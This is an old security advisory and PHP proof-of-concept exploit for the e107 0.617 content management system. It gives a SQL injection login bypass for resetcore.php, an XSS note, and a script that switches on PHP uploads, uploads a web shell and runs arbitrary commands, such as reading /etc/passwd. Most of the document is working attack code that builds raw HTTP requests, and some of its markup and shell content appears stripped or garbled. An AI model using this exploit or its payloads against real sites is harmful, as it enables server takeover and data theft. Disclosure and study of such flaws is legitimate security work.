e107 0.617 remote commands execution

e107 0.617 stable/ 0.6171 / 0.6172 resetcore.php utility SQL Injection / Login bypass / remote code execution / cross site scripting software: site: http://e107.org/news.php description: "e107 is a content management system written in php and using the popular open source mySQL database system for content storage. It's completely free and totally customisable, and in constant development." i) SQL INJECTION move to http://[target]/[path]/e107/e107_files/resetcore.php and login with: user: ' or isnull(1/0)/* password: [nothing] choose to manually edit core values..., so you can edit core items, now we have... ii) XSS: ex., in title core item type: and... iii) remote code execution: modify settings to activate public uploads of .php files upload a file like this: then launch commands: http://[target]/[path]/e107/e107_files/public/cmd.php?cmd=cat%20/etc/passwd this is my poc exploit: e107 0.617 remote commands execution

e107 0.617 resetcore.php SQL injection & remote commands execution

a script byrgod at http://rgod.altervista.org

'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "

	".$headeri[$li+$ki]."
0".$datai."	".$datai."		".$headeri[$li]."

"; } function sendpacket($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { $proxy=trim($proxy); $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path<>'') and ($host<>'') and ($command<>'')) { $port=intval($port); if (($port=='') or ($port<=0)) {$port=80;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} echo 'Initiating exploit against '.htmlentities($host).':'.htmlentities($port); #STEP 1 -> SQL INJECTION in resetcore.php, bypass login and change upload settings $data.="sitename=e107+powered+website&siteurl=".urlencode('http://'.$host.':'.$port.$path)." &sitebutton=button.png&sitetag=e107+website+system&sitedescription=&siteadmin=suntzu &siteadminemail=fakefakefake@suntzu.com&sitetheme=e107v4a&admintheme=e107v4a &sitedisclaimer=All+trademarks+are+%A9+their+respective+owners%2C+all+other+content+ is+%A9+e107+powered+website.%3Cbr+%2F%3Ee107+is+%A9+e107.org+2002%2F2003+and+is+released+under+the+% 3Ca+href%3D%27http%3A%2F%2Fwww.gnu.org%2F%27%3EGNU+GPL+license%3C%2Fa%3E. &newsposts=10&flood_protect=1&flood_timeout=5&flood_time=30&flood_hits=100&anon_post=1 &user_reg=1&use_coppa=1&profanity_filter=1&profanity_replace=%5Bcensored%5D&chatbox_posts=10& smiley_activate=&log_activate=&log_refertype=1&longdate=%25A+%25d+%25B+%25Y+-+%25H%3A%25M%3A%25S& shortdate=%25d+%25b+%3A+%25H%3A%25M&forumdate=%25a+%25b+%25d+%25Y%2C+%25I%3A%25M%25p&sitelanguage= English&maintainance_flag=0&time_offset=0&cb_linkc=+-link-+&cb_wordwrap=20&cb_linkreplace=1& log_lvcount=10&meta_tag=&user_reg_veri=1&email_notify=0&forum_poll=0&forum_popular=10&forum_track=0& forum_eprefix=%5Bforum%5D&forum_enclose=1&forum_title=Forums&forum_postspage=10&user_tracking=cookie& cookie_name=e107cookie&resize_method=gd2&im_path=%2Fusr%2FX11R6%2Fbin%2Fconvert&im_quality=80& im_width=120&im_height=100&upload_enabled=1&upload_allowedfiletype=.php& upload_storagetype=2&upload_maxfilesize=&upload_class=254&cachestatus=&displayrendertime=1& displaysql=&displaythemeinfo=1&link_submit=1&link_submit_class=0&timezone=GMT&search_restrict=1& antiflood1=1&antiflood_timeout=10&autoban=1&coreedit_sub=Save+Core+Settings&a_name="; $data.=urlencode("'or isnull(1/0)/*")."&a_password=d41d8cd98f00b204e9800998ecf8427e"; // ^ ^ // | | // here we have login bypass ;) hash of [nothing] //so, you see, we activate public uploads and .php extensions for attachments $packet="POST ".$p."e107_files/resetcore.php HTTP/1.1\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n"; $packet.="Referer: http://".$host.":".$port.$path."e107_files/resetcore.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Matrix S.p.A. - FAST Enterprise Crawler 6 (Unknown admin e-mail address)\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n"; $packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); if (eregi("Core settings successfully updated",$html)) {echo '
Ok... we reset core values...Continue...';} else {echo '
Exploit failed...'; die;} #STEP 2 -> Upload a shell... $data='------------W1dUnnWzZExD8Rb1Pctwsq Content-Disposition: form-data; name="file_name" baby ------------W1dUnnWzZExD8Rb1Pctwsq Content-Disposition: form-data; name="file_version" 666 ------------W1dUnnWzZExD8Rb1Pctwsq Content-Disposition: form-data; name="file_userfile[]"; filename="c:\suntzu.php" Content-Type: multipart/form-data ------------W1dUnnWzZExD8Rb1Pctwsq Content-Disposition: form-data; name="file_userfile[]"; filename="" ------------W1dUnnWzZExD8Rb1Pctwsq Content-Disposition: form-data; name="file_description" mphhh.... ------------W1dUnnWzZExD8Rb1Pctwsq Content-Disposition: form-data; name="file_website" ------------W1dUnnWzZExD8Rb1Pctwsq Content-Disposition: form-data; name="file_demo" ------------W1dUnnWzZExD8Rb1Pctwsq Content-Disposition: form-data; name="upload" Submit and Upload ------------W1dUnnWzZExD8Rb1Pctwsq--'; $packet="POST ".$p."upload.php HTTP/1.1\r\n"; $packet.="User-Agent: Nokia7110/1.0 (05.01) (Google WAP Proxy/1.0)\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; $packet.="Accept-Language: it,en;q=0.9\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Referer: http://".$host.":".$port.$path."upload.php\r\n"; $packet.="Cookie: e107cookie=1.dcc479d5ffe15c00b2263328f1d60da4\r\n"; $packet.="Cookie2: \$Version=1\r\n"; $packet.="Connection: Close, TE\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); #STEP 3 -> Launch commands... $packet="GET ".$p."e107_files/public/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n"; $packet.="User-Agent: Website eXtractor\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); sendpacket($packet); if (eregi("Hi Master",$html)) {echo 'Exploit succeeded...';} else {echo 'Exploit failed...';} } else {echo 'Fill in requested fields, optionally specify a proxy...';} ?> rgod site: http://rgod.altervista.org mail: retrogod at aliceposta.it original advisory: http://rgod.altervista.org/e107remote.html